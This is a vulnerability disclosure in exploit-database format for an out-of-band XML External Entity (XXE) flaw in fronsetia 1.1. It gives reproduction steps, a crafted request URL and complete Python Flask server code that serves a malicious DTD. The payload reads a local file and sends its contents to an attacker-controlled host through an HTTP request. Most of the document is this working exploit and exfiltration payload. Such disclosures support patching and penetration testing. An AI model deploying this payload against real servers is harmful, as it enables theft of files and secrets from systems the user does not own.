fronsetia 1.1 XML Injection

# Exploit Title: XXE OOB - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.htmlXXE OOBDescription:- It was found that the application was vulnerable XXE (XML External EntityInjection)Steps to Reproduce:1. Add Python3 server to serve malicious XXE payload2. Add a file on the file system to be read via the application XXE payloadecho 123123 > /tmp/1233. Enter the following URL as inputhttp://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl// Python Server Codefrom flask import Flask, Response, requestimport loggingapp = Flask(__name__)# Set up logginglogging.basicConfig(level=logging.DEBUG)@app.route('/testxxeService', defaults={'path': ''})def catch_all(path):    app.logger.debug("Serving XXE payload")    xml = """<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;]><data>&send;</data>"""    return Response(xml, mimetype='text/xml', status=200)@app.route('/data.dtd', defaults={'path': ''})def hello(path):    app.logger.debug("DTD requested")    xml = """<!ENTITY % file SYSTEM "file:///tmp/123"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">%eval;%exfil;"""    return Response(xml, mimetype='text/xml', status=200)if __name__ == "__main__":    app.run(host='0.0.0.0', port=10000)